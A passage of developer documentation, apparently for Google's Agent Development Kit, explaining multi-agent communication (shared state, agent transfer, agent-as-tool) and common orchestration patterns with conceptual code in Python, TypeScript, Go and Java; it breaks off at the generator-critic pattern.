"Checker", Actions: session.EventActions{Escalate: isDone}}, nil) } }, }) processStep, _ := llmagent.New(llmagent.Config{Name: "ProcessingStep", Model: m}) // Agent that might update state["status"] poller, _ := loopagent.New(loopagent.Config{ MaxIterations: 10, AgentConfig: agent.Config{Name: "StatusPoller", SubAgents: []agent.Agent{processStep, checkCondition}}, }) // When poller runs, it executes processStep then Checker repeatedly // until Checker escalates (state["status"] == "completed") or 10 iterations pass. ``` ```` ```java // Conceptual Example: Loop with Condition // Custom agent to check state and potentially escalate public static class CheckConditionAgent extends BaseAgent { public CheckConditionAgent(String name, String description) { super(name, description, List.of(), null, null); } @Override protected Flowable runAsyncImpl(InvocationContext ctx) { String status = (String) ctx.session().state().getOrDefault("status", "pending"); boolean isDone = "completed".equalsIgnoreCase(status); // Emit an event that signals to escalate (exit the loop) if the condition is met. // If not done, the escalate flag will be false or absent, and the loop continues. Event checkEvent = Event.builder() .author(name()) .id(Event.generateEventId()) // Important to give events unique IDs .actions(EventActions.builder().escalate(isDone).build()) // Escalate if done .build(); return Flowable.just(checkEvent); } } // Agent that might update state.put("status") LlmAgent processingStepAgent = LlmAgent.builder().name("ProcessingStep").build(); // Custom agent instance for checking the condition CheckConditionAgent conditionCheckerAgent = new CheckConditionAgent( "ConditionChecker", "Checks if the status is 'completed'." ); LoopAgent poller = LoopAgent.builder().name("StatusPoller").maxIterations(10).subAgents(processingStepAgent, conditionCheckerAgent).build(); // When poller runs, it executes processingStepAgent then conditionCheckerAgent repeatedly // until Checker escalates (state.get("status") == "completed") or 10 iterations pass. ```` ### 1.3. Interaction & Communication Mechanisms Agents within a system often need to exchange data or trigger actions in one another. ADK facilitates this through: #### a) Shared Session State (`session.state`) The most fundamental way for agents operating within the same invocation (and thus sharing the same [`Session`](/adk-docs/sessions/session/) object via the `InvocationContext`) to communicate passively. - **Mechanism:** One agent (or its tool/callback) writes a value (`context.state['data_key'] = processed_data`), and a subsequent agent reads it (`data = context.state.get('data_key')`). State changes are tracked via [`CallbackContext`](https://google.github.io/adk-docs/callbacks/index.md). - **Convenience:** The `output_key` property on [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) automatically saves the agent's final response text (or structured output) to the specified state key. - **Nature:** Asynchronous, passive communication. Ideal for pipelines orchestrated by `SequentialAgent` or passing data across `LoopAgent` iterations. - **See Also:** [State Management](https://google.github.io/adk-docs/sessions/state/index.md) Invocation Context and `temp:` State When a parent agent invokes a sub-agent, it passes the same `InvocationContext`. This means they share the same temporary (`temp:`) state, which is ideal for passing data that is only relevant for the current turn. ```python # Conceptual Example: Using output_key and reading state from google.adk.agents import LlmAgent, SequentialAgent agent_A = LlmAgent(name="AgentA", instruction="Find the capital of France.", output_key="capital_city") agent_B = LlmAgent(name="AgentB", instruction="Tell me about the city stored in {capital_city}.") pipeline = SequentialAgent(name="CityInfo", sub_agents=[agent_A, agent_B]) # AgentA runs, saves "Paris" to state['capital_city']. # AgentB runs, its instruction processor reads state['capital_city'] to get "Paris". ``` ```typescript // Conceptual Example: Using outputKey and reading state import { LlmAgent, SequentialAgent } from '@google/adk'; const agentA = new LlmAgent({name: 'AgentA', instruction: 'Find the capital of France.', outputKey: 'capital_city'}); const agentB = new LlmAgent({name: 'AgentB', instruction: 'Tell me about the city stored in {capital_city}.'}); const pipeline = new SequentialAgent({name: 'CityInfo', subAgents: [agentA, agentB]}); // AgentA runs, saves "Paris" to state['capital_city']. // AgentB runs, its instruction processor reads state['capital_city'] to get "Paris". ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Example: Using output_key and reading state agentA, _ := llmagent.New(llmagent.Config{Name: "AgentA", Instruction: "Find the capital of France.", OutputKey: "capital_city", Model: m}) agentB, _ := llmagent.New(llmagent.Config{Name: "AgentB", Instruction: "Tell me about the city stored in {capital_city}.", Model: m}) pipeline2, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "CityInfo", SubAgents: []agent.Agent{agentA, agentB}}, }) // AgentA runs, saves "Paris" to state["capital_city"]. // AgentB runs, its instruction processor reads state["capital_city"] to get "Paris". ``` ```java // Conceptual Example: Using outputKey and reading state import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; LlmAgent agentA = LlmAgent.builder() .name("AgentA") .instruction("Find the capital of France.") .outputKey("capital_city") .build(); LlmAgent agentB = LlmAgent.builder() .name("AgentB") .instruction("Tell me about the city stored in {capital_city}.") .outputKey("capital_city") .build(); SequentialAgent pipeline = SequentialAgent.builder().name("CityInfo").subAgents(agentA, agentB).build(); // AgentA runs, saves "Paris" to state('capital_city'). // AgentB runs, its instruction processor reads state.get("capital_city") to get "Paris". ``` #### b) LLM-Driven Delegation (Agent Transfer) Leverages an [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md)'s understanding to dynamically route tasks to other suitable agents within the hierarchy. - **Mechanism:** The agent's LLM generates a specific function call: `transfer_to_agent(agent_name='target_agent_name')`. - **Handling:** The `AutoFlow`, used by default when sub-agents are present or transfer isn't disallowed, intercepts this call. It identifies the target agent using `root_agent.find_agent()` and updates the `InvocationContext` to switch execution focus. - **Requires:** The calling `LlmAgent` needs clear `instructions` on when to transfer, and potential target agents need distinct `description`s for the LLM to make informed decisions. Transfer scope (parent, sub-agent, siblings) can be configured on the `LlmAgent`. - **Nature:** Dynamic, flexible routing based on LLM interpretation. ```python # Conceptual Setup: LLM Transfer from google.adk.agents import LlmAgent booking_agent = LlmAgent(name="Booker", description="Handles flight and hotel bookings.") info_agent = LlmAgent(name="Info", description="Provides general information and answers questions.") coordinator = LlmAgent( name="Coordinator", model="gemini-2.0-flash", instruction="You are an assistant. Delegate booking tasks to Booker and info requests to Info.", description="Main coordinator.", # AutoFlow is typically used implicitly here sub_agents=[booking_agent, info_agent] ) # If coordinator receives "Book a flight", its LLM should generate: # FunctionCall(name='transfer_to_agent', args={'agent_name': 'Booker'}) # ADK framework then routes execution to booking_agent. ``` ```typescript // Conceptual Setup: LLM Transfer import { LlmAgent } from '@google/adk'; const bookingAgent = new LlmAgent({name: 'Booker', description: 'Handles flight and hotel bookings.'}); const infoAgent = new LlmAgent({name: 'Info', description: 'Provides general information and answers questions.'}); const coordinator = new LlmAgent({ name: 'Coordinator', model: 'gemini-2.5-flash', instruction: 'You are an assistant. Delegate booking tasks to Booker and info requests to Info.', description: 'Main coordinator.', // AutoFlow is typically used implicitly here subAgents: [bookingAgent, infoAgent] }); // If coordinator receives "Book a flight", its LLM should generate: // {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Booker'}}} // ADK framework then routes execution to bookingAgent. ``` ```go import ( "google.golang.org/adk/agent/llmagent" ) // Conceptual Setup: LLM Transfer bookingAgent, _ := llmagent.New(llmagent.Config{Name: "Booker", Description: "Handles flight and hotel bookings.", Model: m}) infoAgent, _ := llmagent.New(llmagent.Config{Name: "Info", Description: "Provides general information and answers questions.", Model: m}) coordinator, _ = llmagent.New(llmagent.Config{ Name: "Coordinator", Model: m, Instruction: "You are an assistant. Delegate booking tasks to Booker and info requests to Info.", Description: "Main coordinator.", SubAgents: []agent.Agent{bookingAgent, infoAgent}, }) // If coordinator receives "Book a flight", its LLM should generate: // FunctionCall{Name: "transfer_to_agent", Args: map[string]any{"agent_name": "Booker"}} // ADK framework then routes execution to bookingAgent. ``` ```java // Conceptual Setup: LLM Transfer import com.google.adk.agents.LlmAgent; LlmAgent bookingAgent = LlmAgent.builder() .name("Booker") .description("Handles flight and hotel bookings.") .build(); LlmAgent infoAgent = LlmAgent.builder() .name("Info") .description("Provides general information and answers questions.") .build(); // Define the coordinator agent LlmAgent coordinator = LlmAgent.builder() .name("Coordinator") .model("gemini-2.0-flash") // Or your desired model .instruction("You are an assistant. Delegate booking tasks to Booker and info requests to Info.") .description("Main coordinator.") // AutoFlow will be used by default (implicitly) because subAgents are present // and transfer is not disallowed. .subAgents(bookingAgent, infoAgent) .build(); // If coordinator receives "Book a flight", its LLM should generate: // FunctionCall.builder.name("transferToAgent").args(ImmutableMap.of("agent_name", "Booker")).build() // ADK framework then routes execution to bookingAgent. ``` #### c) Explicit Invocation (`AgentTool`) Allows an [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) to treat another `BaseAgent` instance as a callable function or [Tool](/adk-docs/tools-custom/). - **Mechanism:** Wrap the target agent instance in `AgentTool` and include it in the parent `LlmAgent`'s `tools` list. `AgentTool` generates a corresponding function declaration for the LLM. - **Handling:** When the parent LLM generates a function call targeting the `AgentTool`, the framework executes `AgentTool.run_async`. This method runs the target agent, captures its final response, forwards any state/artifact changes back to the parent's context, and returns the response as the tool's result. - **Nature:** Synchronous (within the parent's flow), explicit, controlled invocation like any other tool. - **(Note:** `AgentTool` needs to be imported and used explicitly). ```python # Conceptual Setup: Agent as a Tool from google.adk.agents import LlmAgent, BaseAgent from google.adk.tools import agent_tool from pydantic import BaseModel # Define a target agent (could be LlmAgent or custom BaseAgent) class ImageGeneratorAgent(BaseAgent): # Example custom agent name: str = "ImageGen" description: str = "Generates an image based on a prompt." # ... internal logic ... async def _run_async_impl(self, ctx): # Simplified run logic prompt = ctx.session.state.get("image_prompt", "default prompt") # ... generate image bytes ... image_bytes = b"..." yield Event(author=self.name, content=types.Content(parts=[types.Part.from_bytes(image_bytes, "image/png")])) image_agent = ImageGeneratorAgent() image_tool = agent_tool.AgentTool(agent=image_agent) # Wrap the agent # Parent agent uses the AgentTool artist_agent = LlmAgent( name="Artist", model="gemini-2.0-flash", instruction="Create a prompt and use the ImageGen tool to generate the image.", tools=[image_tool] # Include the AgentTool ) # Artist LLM generates a prompt, then calls: # FunctionCall(name='ImageGen', args={'image_prompt': 'a cat wearing a hat'}) # Framework calls image_tool.run_async(...), which runs ImageGeneratorAgent. # The resulting image Part is returned to the Artist agent as the tool result. ``` ```typescript // Conceptual Setup: Agent as a Tool import { LlmAgent, BaseAgent, AgentTool, InvocationContext } from '@google/adk'; import type { Part, createEvent, Event } from '@google/genai'; // Define a target agent (could be LlmAgent or custom BaseAgent) class ImageGeneratorAgent extends BaseAgent { // Example custom agent constructor() { super({name: 'ImageGen', description: 'Generates an image based on a prompt.'}); } // ... internal logic ... async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { // Simplified run logic const prompt = ctx.session.state['image_prompt'] || 'default prompt'; // ... generate image bytes ... const imageBytes = new Uint8Array(); // placeholder const imagePart: Part = {inlineData: {data: Buffer.from(imageBytes).toString('base64'), mimeType: 'image/png'}}; yield createEvent({content: {parts: [imagePart]}}); } async *runLiveImpl(ctx: InvocationContext): AsyncGenerator { // Not implemented for this agent. } } const imageAgent = new ImageGeneratorAgent(); const imageTool = new AgentTool({agent: imageAgent}); // Wrap the agent // Parent agent uses the AgentTool const artistAgent = new LlmAgent({ name: 'Artist', model: 'gemini-2.5-flash', instruction: 'Create a prompt and use the ImageGen tool to generate the image.', tools: [imageTool] // Include the AgentTool }); // Artist LLM generates a prompt, then calls: // {functionCall: {name: 'ImageGen', args: {image_prompt: 'a cat wearing a hat'}}} // Framework calls imageTool.runAsync(...), which runs ImageGeneratorAgent. // The resulting image Part is returned to the Artist agent as the tool result. ``` ```go import ( "fmt" "iter" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" "google.golang.org/genai" ) // Conceptual Setup: Agent as a Tool // Define a target agent (could be LlmAgent or custom BaseAgent) imageAgent, _ := agent.New(agent.Config{ Name: "ImageGen", Description: "Generates an image based on a prompt.", Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { prompt, _ := ctx.Session().State().Get("image_prompt") fmt.Printf("Generating image for prompt: %v\n", prompt) imageBytes := []byte("...") // Simulate image bytes yield(&session.Event{ Author: "ImageGen", LLMResponse: model.LLMResponse{ Content: &genai.Content{ Parts: []*genai.Part{genai.NewPartFromBytes(imageBytes, "image/png")}, }, }, }, nil) } }, }) // Wrap the agent imageTool := agenttool.New(imageAgent, nil) // Now imageTool can be used as a tool by other agents. // Parent agent uses the AgentTool artistAgent, _ := llmagent.New(llmagent.Config{ Name: "Artist", Model: m, Instruction: "Create a prompt and use the ImageGen tool to generate the image.", Tools: []tool.Tool{imageTool}, // Include the AgentTool }) // Artist LLM generates a prompt, then calls: // FunctionCall{Name: "ImageGen", Args: map[string]any{"image_prompt": "a cat wearing a hat"}} // Framework calls imageTool.Run(...), which runs ImageGeneratorAgent. // The resulting image Part is returned to the Artist agent as the tool result. ``` ```java // Conceptual Setup: Agent as a Tool import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.tools.AgentTool; // Example custom agent (could be LlmAgent or custom BaseAgent) public class ImageGeneratorAgent extends BaseAgent { public ImageGeneratorAgent(String name, String description) { super(name, description, List.of(), null, null); } // ... internal logic ... @Override protected Flowable runAsyncImpl(InvocationContext invocationContext) { // Simplified run logic invocationContext.session().state().get("image_prompt"); // Generate image bytes // ... Event responseEvent = Event.builder() .author(this.name()) .content(Content.fromParts(Part.fromText("..."))) .build(); return Flowable.just(responseEvent); } @Override protected Flowable runLiveImpl(InvocationContext invocationContext) { return null; } } // Wrap the agent using AgentTool ImageGeneratorAgent imageAgent = new ImageGeneratorAgent("image_agent", "generates images"); AgentTool imageTool = AgentTool.create(imageAgent); // Parent agent uses the AgentTool LlmAgent artistAgent = LlmAgent.builder() .name("Artist") .model("gemini-2.0-flash") .instruction( "You are an artist. Create a detailed prompt for an image and then " + "use the 'ImageGen' tool to generate the image. " + "The 'ImageGen' tool expects a single string argument named 'request' " + "containing the image prompt. The tool will return a JSON string in its " + "'result' field, containing 'image_base64', 'mime_type', and 'status'." ) .description("An agent that can create images using a generation tool.") .tools(imageTool) // Include the AgentTool .build(); // Artist LLM generates a prompt, then calls: // FunctionCall(name='ImageGen', args={'imagePrompt': 'a cat wearing a hat'}) // Framework calls imageTool.runAsync(...), which runs ImageGeneratorAgent. // The resulting image Part is returned to the Artist agent as the tool result. ``` These primitives provide the flexibility to design multi-agent interactions ranging from tightly coupled sequential workflows to dynamic, LLM-driven delegation networks. ## 2. Common Multi-Agent Patterns using ADK Primitives By combining ADK's composition primitives, you can implement various established patterns for multi-agent collaboration. ### Coordinator/Dispatcher Pattern - **Structure:** A central [`LlmAgent`](https://google.github.io/adk-docs/agents/llm-agents/index.md) (Coordinator) manages several specialized `sub_agents`. - **Goal:** Route incoming requests to the appropriate specialist agent. - **ADK Primitives Used:** - **Hierarchy:** Coordinator has specialists listed in `sub_agents`. - **Interaction:** Primarily uses **LLM-Driven Delegation** (requires clear `description`s on sub-agents and appropriate `instruction` on Coordinator) or **Explicit Invocation (`AgentTool`)** (Coordinator includes `AgentTool`-wrapped specialists in its `tools`). ```python # Conceptual Code: Coordinator using LLM Transfer from google.adk.agents import LlmAgent billing_agent = LlmAgent(name="Billing", description="Handles billing inquiries.") support_agent = LlmAgent(name="Support", description="Handles technical support requests.") coordinator = LlmAgent( name="HelpDeskCoordinator", model="gemini-2.0-flash", instruction="Route user requests: Use Billing agent for payment issues, Support agent for technical problems.", description="Main help desk router.", # allow_transfer=True is often implicit with sub_agents in AutoFlow sub_agents=[billing_agent, support_agent] ) # User asks "My payment failed" -> Coordinator's LLM should call transfer_to_agent(agent_name='Billing') # User asks "I can't log in" -> Coordinator's LLM should call transfer_to_agent(agent_name='Support') ``` ```typescript // Conceptual Code: Coordinator using LLM Transfer import { LlmAgent } from '@google/adk'; const billingAgent = new LlmAgent({name: 'Billing', description: 'Handles billing inquiries.'}); const supportAgent = new LlmAgent({name: 'Support', description: 'Handles technical support requests.'}); const coordinator = new LlmAgent({ name: 'HelpDeskCoordinator', model: 'gemini-2.5-flash', instruction: 'Route user requests: Use Billing agent for payment issues, Support agent for technical problems.', description: 'Main help desk router.', // allowTransfer=true is often implicit with subAgents in AutoFlow subAgents: [billingAgent, supportAgent] }); // User asks "My payment failed" -> Coordinator's LLM should call {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Billing'}}} // User asks "I can't log in" -> Coordinator's LLM should call {functionCall: {name: 'transfer_to_agent', args: {agent_name: 'Support'}}} ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" ) // Conceptual Code: Coordinator using LLM Transfer billingAgent, _ := llmagent.New(llmagent.Config{Name: "Billing", Description: "Handles billing inquiries.", Model: m}) supportAgent, _ := llmagent.New(llmagent.Config{Name: "Support", Description: "Handles technical support requests.", Model: m}) coordinator, _ := llmagent.New(llmagent.Config{ Name: "HelpDeskCoordinator", Model: m, Instruction: "Route user requests: Use Billing agent for payment issues, Support agent for technical problems.", Description: "Main help desk router.", SubAgents: []agent.Agent{billingAgent, supportAgent}, }) // User asks "My payment failed" -> Coordinator's LLM should call transfer_to_agent(agent_name='Billing') // User asks "I can't log in" -> Coordinator's LLM should call transfer_to_agent(agent_name='Support') ``` ```java // Conceptual Code: Coordinator using LLM Transfer import com.google.adk.agents.LlmAgent; LlmAgent billingAgent = LlmAgent.builder() .name("Billing") .description("Handles billing inquiries and payment issues.") .build(); LlmAgent supportAgent = LlmAgent.builder() .name("Support") .description("Handles technical support requests and login problems.") .build(); LlmAgent coordinator = LlmAgent.builder() .name("HelpDeskCoordinator") .model("gemini-2.0-flash") .instruction("Route user requests: Use Billing agent for payment issues, Support agent for technical problems.") .description("Main help desk router.") .subAgents(billingAgent, supportAgent) // Agent transfer is implicit with sub agents in the Autoflow, unless specified // using .disallowTransferToParent or disallowTransferToPeers .build(); // User asks "My payment failed" -> Coordinator's LLM should call // transferToAgent(agentName='Billing') // User asks "I can't log in" -> Coordinator's LLM should call // transferToAgent(agentName='Support') ``` ### Sequential Pipeline Pattern - **Structure:** A [`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md) contains `sub_agents` executed in a fixed order. - **Goal:** Implement a multistep process where the output of one-step feeds into the next. - **ADK Primitives Used:** - **Workflow:** `SequentialAgent` defines the order. - **Communication:** Primarily uses **Shared Session State**. Earlier agents write results (often via `output_key`), later agents read those results from `context.state`. ```python # Conceptual Code: Sequential Data Pipeline from google.adk.agents import SequentialAgent, LlmAgent validator = LlmAgent(name="ValidateInput", instruction="Validate the input.", output_key="validation_status") processor = LlmAgent(name="ProcessData", instruction="Process data if {validation_status} is 'valid'.", output_key="result") reporter = LlmAgent(name="ReportResult", instruction="Report the result from {result}.") data_pipeline = SequentialAgent( name="DataPipeline", sub_agents=[validator, processor, reporter] ) # validator runs -> saves to state['validation_status'] # processor runs -> reads state['validation_status'], saves to state['result'] # reporter runs -> reads state['result'] ``` ```typescript // Conceptual Code: Sequential Data Pipeline import { SequentialAgent, LlmAgent } from '@google/adk'; const validator = new LlmAgent({name: 'ValidateInput', instruction: 'Validate the input.', outputKey: 'validation_status'}); const processor = new LlmAgent({name: 'ProcessData', instruction: 'Process data if {validation_status} is "valid".', outputKey: 'result'}); const reporter = new LlmAgent({name: 'ReportResult', instruction: 'Report the result from {result}.'}); const dataPipeline = new SequentialAgent({ name: 'DataPipeline', subAgents: [validator, processor, reporter] }); // validator runs -> saves to state['validation_status'] // processor runs -> reads state['validation_status'], saves to state['result'] // reporter runs -> reads state['result'] ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Code: Sequential Data Pipeline validator, _ := llmagent.New(llmagent.Config{Name: "ValidateInput", Instruction: "Validate the input.", OutputKey: "validation_status", Model: m}) processor, _ := llmagent.New(llmagent.Config{Name: "ProcessData", Instruction: "Process data if {validation_status} is 'valid'.", OutputKey: "result", Model: m}) reporter, _ := llmagent.New(llmagent.Config{Name: "ReportResult", Instruction: "Report the result from {result}.", Model: m}) dataPipeline, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "DataPipeline", SubAgents: []agent.Agent{validator, processor, reporter}}, }) // validator runs -> saves to state["validation_status"] // processor runs -> reads state["validation_status"], saves to state["result"] // reporter runs -> reads state["result"] ``` ```java // Conceptual Code: Sequential Data Pipeline import com.google.adk.agents.SequentialAgent; LlmAgent validator = LlmAgent.builder() .name("ValidateInput") .instruction("Validate the input") .outputKey("validation_status") // Saves its main text output to session.state["validation_status"] .build(); LlmAgent processor = LlmAgent.builder() .name("ProcessData") .instruction("Process data if {validation_status} is 'valid'") .outputKey("result") // Saves its main text output to session.state["result"] .build(); LlmAgent reporter = LlmAgent.builder() .name("ReportResult") .instruction("Report the result from {result}") .build(); SequentialAgent dataPipeline = SequentialAgent.builder() .name("DataPipeline") .subAgents(validator, processor, reporter) .build(); // validator runs -> saves to state['validation_status'] // processor runs -> reads state['validation_status'], saves to state['result'] // reporter runs -> reads state['result'] ``` ### Parallel Fan-Out/Gather Pattern - **Structure:** A [`ParallelAgent`](https://google.github.io/adk-docs/agents/workflow-agents/parallel-agents/index.md) runs multiple `sub_agents` concurrently, often followed by a later agent (in a `SequentialAgent`) that aggregates results. - **Goal:** Execute independent tasks simultaneously to reduce latency, then combine their outputs. - **ADK Primitives Used:** - **Workflow:** `ParallelAgent` for concurrent execution (Fan-Out). Often nested within a `SequentialAgent` to handle the subsequent aggregation step (Gather). - **Communication:** Sub-agents write results to distinct keys in **Shared Session State**. The subsequent "Gather" agent reads multiple state keys. ```python # Conceptual Code: Parallel Information Gathering from google.adk.agents import SequentialAgent, ParallelAgent, LlmAgent fetch_api1 = LlmAgent(name="API1Fetcher", instruction="Fetch data from API 1.", output_key="api1_data") fetch_api2 = LlmAgent(name="API2Fetcher", instruction="Fetch data from API 2.", output_key="api2_data") gather_concurrently = ParallelAgent( name="ConcurrentFetch", sub_agents=[fetch_api1, fetch_api2] ) synthesizer = LlmAgent( name="Synthesizer", instruction="Combine results from {api1_data} and {api2_data}." ) overall_workflow = SequentialAgent( name="FetchAndSynthesize", sub_agents=[gather_concurrently, synthesizer] # Run parallel fetch, then synthesize ) # fetch_api1 and fetch_api2 run concurrently, saving to state. # synthesizer runs afterwards, reading state['api1_data'] and state['api2_data']. ``` ```typescript // Conceptual Code: Parallel Information Gathering import { SequentialAgent, ParallelAgent, LlmAgent } from '@google/adk'; const fetchApi1 = new LlmAgent({name: 'API1Fetcher', instruction: 'Fetch data from API 1.', outputKey: 'api1_data'}); const fetchApi2 = new LlmAgent({name: 'API2Fetcher', instruction: 'Fetch data from API 2.', outputKey: 'api2_data'}); const gatherConcurrently = new ParallelAgent({ name: 'ConcurrentFetch', subAgents: [fetchApi1, fetchApi2] }); const synthesizer = new LlmAgent({ name: 'Synthesizer', instruction: 'Combine results from {api1_data} and {api2_data}.' }); const overallWorkflow = new SequentialAgent({ name: 'FetchAndSynthesize', subAgents: [gatherConcurrently, synthesizer] // Run parallel fetch, then synthesize }); // fetchApi1 and fetchApi2 run concurrently, saving to state. // synthesizer runs afterwards, reading state['api1_data'] and state['api2_data']. ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/parallelagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Code: Parallel Information Gathering fetchAPI1, _ := llmagent.New(llmagent.Config{Name: "API1Fetcher", Instruction: "Fetch data from API 1.", OutputKey: "api1_data", Model: m}) fetchAPI2, _ := llmagent.New(llmagent.Config{Name: "API2Fetcher", Instruction: "Fetch data from API 2.", OutputKey: "api2_data", Model: m}) gatherConcurrently, _ := parallelagent.New(parallelagent.Config{ AgentConfig: agent.Config{Name: "ConcurrentFetch", SubAgents: []agent.Agent{fetchAPI1, fetchAPI2}}, }) synthesizer, _ := llmagent.New(llmagent.Config{Name: "Synthesizer", Instruction: "Combine results from {api1_data} and {api2_data}.", Model: m}) overallWorkflow, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "FetchAndSynthesize", SubAgents: []agent.Agent{gatherConcurrently, synthesizer}}, }) // fetch_api1 and fetch_api2 run concurrently, saving to state. // synthesizer runs afterwards, reading state["api1_data"] and state["api2_data"]. ``` ```java // Conceptual Code: Parallel Information Gathering import com.google.adk.agents.LlmAgent; import com.google.adk.agents.ParallelAgent; import com.google.adk.agents.SequentialAgent; LlmAgent fetchApi1 = LlmAgent.builder() .name("API1Fetcher") .instruction("Fetch data from API 1.") .outputKey("api1_data") .build(); LlmAgent fetchApi2 = LlmAgent.builder() .name("API2Fetcher") .instruction("Fetch data from API 2.") .outputKey("api2_data") .build(); ParallelAgent gatherConcurrently = ParallelAgent.builder() .name("ConcurrentFetcher") .subAgents(fetchApi2, fetchApi1) .build(); LlmAgent synthesizer = LlmAgent.builder() .name("Synthesizer") .instruction("Combine results from {api1_data} and {api2_data}.") .build(); SequentialAgent overallWorfklow = SequentialAgent.builder() .name("FetchAndSynthesize") // Run parallel fetch, then synthesize .subAgents(gatherConcurrently, synthesizer) .build(); // fetch_api1 and fetch_api2 run concurrently, saving to state. // synthesizer runs afterwards, reading state['api1_data'] and state['api2_data']. ``` ### Hierarchical Task Decomposition - **Structure:** A multi-level tree of agents where higher-level agents break down complex goals and delegate sub-tasks to lower-level agents. - **Goal:** Solve complex problems by recursively breaking them down into simpler, executable steps. - **ADK Primitives Used:** - **Hierarchy:** Multi-level `parent_agent`/`sub_agents` structure. - **Interaction:** Primarily **LLM-Driven Delegation** or **Explicit Invocation (`AgentTool`)** used by parent agents to assign tasks to subagents. Results are returned up the hierarchy (via tool responses or state). ```python # Conceptual Code: Hierarchical Research Task from google.adk.agents import LlmAgent from google.adk.tools import agent_tool # Low-level tool-like agents web_searcher = LlmAgent(name="WebSearch", description="Performs web searches for facts.") summarizer = LlmAgent(name="Summarizer", description="Summarizes text.") # Mid-level agent combining tools research_assistant = LlmAgent( name="ResearchAssistant", model="gemini-2.0-flash", description="Finds and summarizes information on a topic.", tools=[agent_tool.AgentTool(agent=web_searcher), agent_tool.AgentTool(agent=summarizer)] ) # High-level agent delegating research report_writer = LlmAgent( name="ReportWriter", model="gemini-2.0-flash", instruction="Write a report on topic X. Use the ResearchAssistant to gather information.", tools=[agent_tool.AgentTool(agent=research_assistant)] # Alternatively, could use LLM Transfer if research_assistant is a sub_agent ) # User interacts with ReportWriter. # ReportWriter calls ResearchAssistant tool. # ResearchAssistant calls WebSearch and Summarizer tools. # Results flow back up. ``` ```typescript // Conceptual Code: Hierarchical Research Task import { LlmAgent, AgentTool } from '@google/adk'; // Low-level tool-like agents const webSearcher = new LlmAgent({name: 'WebSearch', description: 'Performs web searches for facts.'}); const summarizer = new LlmAgent({name: 'Summarizer', description: 'Summarizes text.'}); // Mid-level agent combining tools const researchAssistant = new LlmAgent({ name: 'ResearchAssistant', model: 'gemini-2.5-flash', description: 'Finds and summarizes information on a topic.', tools: [new AgentTool({agent: webSearcher}), new AgentTool({agent: summarizer})] }); // High-level agent delegating research const reportWriter = new LlmAgent({ name: 'ReportWriter', model: 'gemini-2.5-flash', instruction: 'Write a report on topic X. Use the ResearchAssistant to gather information.', tools: [new AgentTool({agent: researchAssistant})] // Alternatively, could use LLM Transfer if researchAssistant is a subAgent }); // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. ``` ```go import ( "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" ) // Conceptual Code: Hierarchical Research Task // Low-level tool-like agents webSearcher, _ := llmagent.New(llmagent.Config{Name: "WebSearch", Description: "Performs web searches for facts.", Model: m}) summarizer, _ := llmagent.New(llmagent.Config{Name: "Summarizer", Description: "Summarizes text.", Model: m}) // Mid-level agent combining tools webSearcherTool := agenttool.New(webSearcher, nil) summarizerTool := agenttool.New(summarizer, nil) researchAssistant, _ := llmagent.New(llmagent.Config{ Name: "ResearchAssistant", Model: m, Description: "Finds and summarizes information on a topic.", Tools: []tool.Tool{webSearcherTool, summarizerTool}, }) // High-level agent delegating research researchAssistantTool := agenttool.New(researchAssistant, nil) reportWriter, _ := llmagent.New(llmagent.Config{ Name: "ReportWriter", Model: m, Instruction: "Write a report on topic X. Use the ResearchAssistant to gather information.", Tools: []tool.Tool{researchAssistantTool}, }) // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. ``` ```java // Conceptual Code: Hierarchical Research Task import com.google.adk.agents.LlmAgent; import com.google.adk.tools.AgentTool; // Low-level tool-like agents LlmAgent webSearcher = LlmAgent.builder() .name("WebSearch") .description("Performs web searches for facts.") .build(); LlmAgent summarizer = LlmAgent.builder() .name("Summarizer") .description("Summarizes text.") .build(); // Mid-level agent combining tools LlmAgent researchAssistant = LlmAgent.builder() .name("ResearchAssistant") .model("gemini-2.0-flash") .description("Finds and summarizes information on a topic.") .tools(AgentTool.create(webSearcher), AgentTool.create(summarizer)) .build(); // High-level agent delegating research LlmAgent reportWriter = LlmAgent.builder() .name("ReportWriter") .model("gemini-2.0-flash") .instruction("Write a report on topic X. Use the ResearchAssistant to gather information.") .tools(AgentTool.create(researchAssistant)) // Alternatively, could use LLM Transfer if research_assistant is a subAgent .build(); // User interacts with ReportWriter. // ReportWriter calls ResearchAssistant tool. // ResearchAssistant calls WebSearch and Summarizer tools. // Results flow back up. ``` ### Review/Critique Pattern (Generator-Critic) - **Structure:** Typically involves two agents within a [`SequentialAgent`](https://google.github.io/adk-docs/agents/workflow-agents/sequential-agents/index.md): a Generator and a Critic/Reviewer. - **Goal:** Improve the quality or validity of generated output by having a dedicated agent review it. - **ADK Primitives Used:** - **Workflow:** 